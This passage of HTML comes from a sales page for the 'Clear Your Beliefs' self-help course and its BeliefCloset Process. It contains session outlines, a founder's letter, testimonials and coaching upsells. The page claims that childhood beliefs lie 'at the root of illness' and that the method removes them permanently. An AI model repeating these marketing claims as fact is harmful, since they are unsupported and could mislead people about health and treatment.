beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, 